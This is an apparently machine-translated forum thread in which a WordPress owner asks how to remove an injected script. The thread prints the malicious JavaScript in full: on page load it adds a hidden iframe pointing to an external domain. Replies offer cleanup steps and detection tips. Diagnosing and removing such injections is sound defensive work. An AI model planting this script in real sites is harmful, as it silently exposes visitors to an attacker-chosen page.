我浏览了我的网站,注意到了以前没有的滚动。
检查后,我发现有一个看不见的iFrame。
在源代码页面中看到iframe后,我查看了所有的网站文件,但找不到源代码中的同一行代码。
我运行我的网站寻找恶意软件,但一切都很干净。几个月前,我确实收到了谷歌的警告,但我的主机删除了恶意文件,谷歌批准了清理,现在仍然如此。但现在我看到了这个带有url的不可见对象。
源脚本:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
我看到它是由wp_head();带来的,但我仔细查看了一下,没有发现任何可疑之处。
有没有人有关于寻找这种注射的提示,以手动将其从我的WP网站上删除?
免费WP主题/插件因使用base64_encode在源代码中"隐藏"恶意或不需要的代码而臭名昭著。基本上,他们将编码后的文本存储在其中一个文件中,然后对其进行base64_decode并将结果呈现为html。我会尝试在源代码中对base64_decode进行greppingsearching,看看它是否已经完成。
wp_head()本身在这种情况下不会被用于传播网站中的"恶意"代码。该代码不在wp_head()的其他位置。
1-对当前网站进行完整备份(数据库+文件)2-停用所有插件,看看恶意代码是否仍然存在。2-如果恶意代码仍然存在,请检查您的主题文件夹。在默认主题上,转到functions.php并在该文件中搜索该代码,或base64加密代码、eval、includes等。3-如果恶意代码不存在,在你停用所有插件后,这意味着恶意代码在其中一个插件上。
使用除法&征服方法首先找到安装恶意代码的插件,然后识别出有恶意代码的文件。
我也遇到了同样的问题。主题目录和核心文件中的许多文件都经过了调整。导致该问题的主要原因(iframe代码是在标记之前注入的)是根文件夹中的index.php。有一个假的"eAccelerate"代码注入了编码的iframe。
我能够用WordFence插件检测到,它给了我被篡改文件的列表。
我正在调查网站是如何被黑客入侵的,因为我有最新版本的WP和插件,知道吗?